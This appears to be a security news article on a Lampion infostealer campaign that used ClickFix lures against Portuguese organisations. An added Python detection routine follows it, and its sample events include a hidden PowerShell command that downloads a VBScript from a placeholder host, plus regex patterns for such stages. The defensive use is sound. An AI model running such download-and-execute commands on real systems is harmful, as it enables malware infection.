Palo Alto Networks’ Unit 42 researchers have uncovered a sophisticated malicious campaign aimed at dozens of Portuguese organizations, with a focus on the government, finance, and transportation sectors. The campaign is the latest operation by the threat actors behind the Lampion malware, an infostealer known for its focus on sensitive banking data, which has been in circulation since at least 2019.
The campaign has been active from late 2024 through early 2025, according to the researchers. The new campaign involves a social engineering technique known as ClickFix, a method first observed gaining traction among various malware families in late 2024. ClickFix lures victims into executing malicious PowerShell commands on their machines under the guise of resolving computer issues, such as software installation errors or missing updates.
ClickFix has become an increasingly popular vector for crimeware operators, including those behind Lumma Stealer and NetSupport RAT.
The campaign mirrors previous Lampion malware activity, both in its infrastructure and in its tactics, techniques, and procedures (TTPs). Researchers observed the attackers using heavily obfuscated Visual Basic (VB) scripts and phishing lures that bear striking similarities to prior Lampion campaigns.
The infection chain begins with a phishing email containing a malicious ZIP file. The ZIP archive contains an HTML file that, when opened, redirects the user to a spoofed website impersonating the Portuguese Tax Authority (Autoridade Tributária e Aduaneira). The fake website then presents a fake document or installation screen, prompting users to copy and run a PowerShell command.
Once executed, the command downloads and runs an obfuscated VBScript, initiating the next stage of infection. Although the researchers found the final malware payload commented out in the samples analyzed, the rest of the infection chain was intact and functional. This suggests the attackers may be preparing for a broader deployment, potentially delivering active payloads in future waves.
“Another interesting aspect of Lampion’s infection chain is that it is divided into several non-consecutive stages, executed as separate processes,” the researchers said. “This dispersed execution complicates detection, as the attack flow does not form a readily identifiable process tree. Instead, it comprises a complex chain of individual events, some of which could appear benign in isolation.”
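As an added illustration (not code from the Unit 42 report): a small correlation routine that links the separately spawned PowerShell and VBScript stages by host and time window rather than by process ancestry, which is the gap the researchers describe. The event layout, host names and command lines are constructed samples, not real telemetry.

```python
from datetime import datetime, timedelta
import re

# Constructed sample process-creation events: (timestamp, host, parent image,
# image, command line); a hypothetical EDR export, not a real product schema.
# On ws01 the user-run PowerShell stage is a child of explorer.exe while the
# VBScript stage has a different parent, so no single process tree links them.
SAMPLE_EVENTS = [
    ("2025-01-15T09:00:01", "ws01", "explorer.exe", "powershell.exe",
     'powershell -w hidden -c "iwr http://example.invalid/a -OutFile $env:TEMP\\a.vbs"'),
    ("2025-01-15T09:00:40", "ws01", "wmiprvse.exe", "wscript.exe",
     "wscript.exe C:\\Users\\u\\AppData\\Local\\Temp\\a.vbs"),
    ("2025-01-15T09:05:00", "ws02", "explorer.exe", "powershell.exe",
     "powershell -c Get-Date"),
    ("2025-01-15T11:30:00", "ws02", "services.exe", "wscript.exe",
     "wscript.exe C:\\scripts\\inventory.vbs"),
]

# Stage signatures: a hidden or downloading PowerShell launch, and Windows
# Script Host running a .vbs out of a temp/AppData path.
STAGE_RULES = [
    ("clickfix_powershell",
     re.compile(r"powershell.*(-w(indowstyle)?\s+hidden|iwr|invoke-webrequest|downloadstring)", re.I)),
    ("temp_vbscript",
     re.compile(r"[cw]script\.exe.*\\(temp|appdata)\\.*\.vbs", re.I)),
]
WINDOW = timedelta(minutes=10)

def classify(cmdline):
    """Return the stage name a command line matches, or None."""
    for name, rule in STAGE_RULES:
        if rule.search(cmdline):
            return name
    return None

def correlate(events, window=WINDOW):
    """Alert when both stages fire on one host, in order, within `window`,
    regardless of which process spawned which."""
    hits = {}  # host -> list of (time, stage)
    for ts, host, _parent, _image, cmdline in events:
        stage = classify(cmdline)
        if stage:
            hits.setdefault(host, []).append((datetime.fromisoformat(ts), stage))
    alerts = []
    for host, items in hits.items():
        ps = [t for t, s in items if s == "clickfix_powershell"]
        vbs = [t for t, s in items if s == "temp_vbscript"]
        alerts += [(host, a.isoformat(), b.isoformat()) for a in ps for b in vbs
                   if timedelta(0) <= b - a <= window]
    return alerts
```

On the sample data only ws01 is flagged: ws02's PowerShell launch is benign and its scheduled .vbs runs from a non-temp path, so neither stage rule fires there.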